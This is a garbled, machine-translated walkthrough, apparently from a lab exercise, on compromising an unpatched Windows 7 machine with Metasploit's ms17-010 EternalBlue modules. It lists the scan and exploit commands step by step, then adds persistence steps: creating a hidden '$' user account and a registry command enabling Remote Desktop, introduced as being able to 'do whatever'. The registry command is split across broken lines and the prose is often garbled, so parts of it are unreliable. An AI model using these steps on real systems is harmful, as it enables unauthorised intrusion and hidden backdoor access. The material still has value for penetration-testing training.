Initial use metasploit exploit framework, intrusion obtain permission to acquire win7
Target system: windows7, no fixes
Target ip address: 192.168.20.131
Task: Using ms17-010, eternal blue loophole to obtain control of the target system
1, before using metasploit, Postgresql need to open the database, enter the command service Postgresql start to open service
2, enter the command msfconsole, start metasploit, the system displays the msf5 is complete start
3, is first determined using the plug-in directory, enter the command search ms17-010, determines to use the directory scan widget
can be seen,
Auxiliary / Scanner / smb / smb_ms17_010 , this is a scan ms17-010 determine whether there is a script directory of the vulnerability
exploit / windows / smb / ms17_010_eternalblue, this is an exploit script directory
4, after which directories are OK to start the official use, input use Auxiliary / Scanner / smb / smb_ms17_010, enter the directory scan
5, after entering the directory scan, can show options, view the scan parameters to be set
6, set parameters, enter commands, set rhosts 192.168.20.131, scan the host to determine
7, enter exploit, to determine the presence of the target host can be exploited
8, since it can be used to determine, and it bluntly, huh, input use exploit / Windows / smb / ms17_010_eternalblue, enter ms17-010 exploits next script, set rhosts 192.168.20.131, set up the attacking host
9, run the exploit, start the attack, successfully won, and direct access to the system privileges
10, after winning the shell, of course can do whatever,
net user $ username / add, add a hidden user
net user $ username and password, set up to hide the user's password
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal
" "
Server
/v
fDenyTSConnections
/t
REG_DWORD
/d
00000000
/f,开启3389端口
11, summary
metasploit-framework is indeed necessary to make the network penetration testing tool that provides a lot of common exploit scripts easy to use test, greatly saves testers time, is excellent, penetration testers to make sure proficient
Finish